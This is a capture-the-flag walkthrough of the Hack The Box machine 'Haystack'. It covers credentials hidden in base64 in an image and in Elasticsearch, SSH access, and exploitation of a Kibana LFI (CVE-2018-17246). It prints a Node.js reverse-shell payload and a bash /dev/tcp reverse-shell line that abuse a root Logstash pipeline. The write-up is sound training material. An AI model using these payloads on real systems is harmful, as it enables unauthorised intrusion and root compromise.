Haystack
Hack The Box
https://www.hackthebox.eu/home/machines/profile/195

Let's start enumerating the box with a port scan.
# Nmap 7.70 scan initiated Sun Jun 30 00:33:22 2019 as: nmap -sC -sV -oA nmap.nmap 10.10.10.115
Nmap scan report for 10.10.10.115
Host is up (0.59s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (application/json; charset=UTF-8)
The nmap scan tells us the following:
Port 22 -> SSH server (OpenSSH 7.4)
Port 80 -> web server running nginx 1.12.2
Port 9200 -> another web server running nginx (9200 is the default Elasticsearch HTTP port)
So, if we browse the site on port 80, we see an image of a needle.

When we download the image and run the strings command on it, we see that there is a base64-encoded string at the end.

Decoding the base64 string gives us a Spanish phrase.

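The extraction and decoding can be done in one go, e.g. strings needle.jpg | tail -n 1 | base64 -d. For illustration (the base64 string shown here is the one recovered from the end of the image; confirm against your own strings output):

```shell
# Decode the trailing base64 blob found in the image
echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
# prints: la aguja en el pajar es "clave"
```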
On translating this string we get:
the needle in the haystack is "key"
If we try to enumerate more on this page, we get nothing else of interest.
Now let's switch to the web service on port 9200. The response is a JSON page from an Elasticsearch server.

Now, since we know Elasticsearch is involved, I looked through the documentation linked from its main page and came to know about the _search API.

Now, looking back, recall the string we recovered earlier:
the needle in the haystack is "key"
So we can interpret that we have to search for the key in the whole stack. Since the original phrase was in Spanish, the term to search for is "clave". I did this in the browser:
haystack.htb:9200/_search?q=clave

"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg"
"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="
These are the two strings we got (both in Spanish); translated, they read:
“I have to keep the password for the machine: dXNlcjogc2VjdXJpdHkg”
“This key can not be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=”
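The values themselves are base64 as well; decoding both gives us credentials:

```shell
# Decode the two base64 values returned by the _search query
echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d        # prints: user: security
echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d  # prints: pass: spanish.is.key
```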

Now we have a username and a password, so we can log in via SSH.

Elevating privileges
Now that we are logged in as the security user, enumerating the box shows that Kibana is running on the system.

Kibana is an open source data visualization plugin for Elasticsearch
Since the Kibana service is running on the system, there must be a port associated with it.
I wanted to check with netcat, but found it is not installed on the system, so I wrote a small script to see if there are any more open ports on the localhost interface:
import socket

# Try to connect to every TCP port on localhost and report the open ones
for p in range(65536):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    r = s.connect_ex(('localhost', p))
    if r == 0:
        print('Port ' + str(p) + ' is open')
    s.close()
The script confirms that Kibana is indeed running, on its default port 5601.
Now let's forward that port to our local machine to look further, for example with ssh -L 5601:127.0.0.1:5601 security@10.10.10.115


So, if we go to the Management tab we see that the Kibana version is 6.4.2, and a quick search shows that this version is subject to a Local File Inclusion (LFI) vulnerability, CVE-2018-17246.
https://github.com/mpgn/CVE-2018-17246
The PoC provides a reverse-shell payload, which we can include via the LFI:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8089, "10.10.14.26", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

We can save this payload to a file on the target (we already have SSH access as security), start a listener on port 8089, and trigger the inclusion with curl to get a reverse shell as the kibana user.

Let’s hunt for root
On enumerating the box, I found that Logstash is running as root. Logstash is another product by Elastic, used for data collection and pipelining from various sources.
A Logstash pipeline consists of 3 stages:
Input → Filter → Output
Input - generates events, for example by reading a log file
Filter - intermediary processing of events, such as transformations
Output - dispatches the processed events to some destination
In /etc/logstash/conf.d we see that there are 3 files, named after these stages.
So let's take a look at these files one by one.

So, it is using the file input plugin, which is capable of generating events by reading files. Looking at the path option, we can see it reads any file whose name starts with logstash_ in the /opt/kibana directory.
The stat_interval option tells it to check the files every 10 seconds.
Each event generated this way is tagged with the type "execute".
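Based on the description above, input.conf looks roughly like this (a reconstruction from the description, not a verbatim copy):

```
input {
  file {
    path => "/opt/kibana/logstash_*"   # any file starting with logstash_
    stat_interval => "10 second"       # re-check the files every 10 seconds
    type => "execute"                  # tag each event with type "execute"
  }
}
```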
Now looking at filter.conf

So, this is using the grok plugin. This plugin matches the data passed from the input stage and puts it into structured form.
Any data read by the input plugin is matched against the pattern given for the message field.
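From the description, filter.conf is approximately the following (reconstructed; the exact whitespace in the pattern may differ):

```
filter {
  grok {
    match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
  }
}
```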
Let's break down the message pattern:
Ejecutar → the content of the file should start with this literal.
\s* → \s means whitespace, and with * there can be zero or more whitespace characters.
comando → another literal.
\s* → again, zero or more whitespace characters, followed by a literal colon.
\s+ → here \s is whitespace and + means there must be at least one whitespace character.
%{GREEDYDATA:comando} → a named capture group: grok captures whatever data follows into the field comando.
Hence, the final format a file must follow is:
Ejecutar comando : <command_to_execute>
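Since grok patterns are regular expressions underneath, we can sanity-check the expected line format locally; here is a rough equivalent using sed (a stand-in for grok, not the actual plugin):

```shell
# Extract the command portion from a line in the expected "Ejecutar comando :" format
echo 'Ejecutar comando : whoami' \
  | sed -nE 's/^Ejecutar[[:space:]]*comando[[:space:]]*:[[:space:]]+(.*)$/\1/p'
# prints: whoami
```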
OK, so now let's move to the last file, output.conf, to which the filter passes its contents.

So, at first it verifies the type: if the event has type "execute" it moves forward; otherwise it does not.
The output stage uses 2 plugins, stdout and exec:
stdout - prints the event to the console; here the output is in JSON format.
exec - executes the command given in its command option, which references the captured comando field.
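Putting the pieces together, output.conf looks roughly like this (a reconstruction; the trailing & in the command is an assumption):

```
output {
  if [type] == "execute" {
    stdout { codec => json }      # echo the event as JSON
    exec {
      command => "%{comando} &"   # execute the captured command
    }
  }
}
```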
Now that we have covered the functionality of all 3 files, let's look at how we can abuse them to gain root privileges.

Looking at the running processes, we can see that logstash is running as root, and that /opt/kibana (from where input.conf fetches its content) is writable by our current user.
So we can create a file matching logstash_* (say, logstash_k) so that input.conf will read it:
echo "Ejecutar comando: bash -i >& /dev/tcp/<ip>/<port> 0>&1" > logstash_k
The content will be read by the input stage, matched by filter.conf, and passed on to output.conf.
output.conf will then execute the captured command and give us a shell as root.

Thanks for reading
HackTheBox Profile Link :-
https://www.hackthebox.eu/home/users/profile/67447
I have also created an auto-pwn script for this box, which gets root on the box directly.
https://github.com/kush9408/Autopwn-Scripts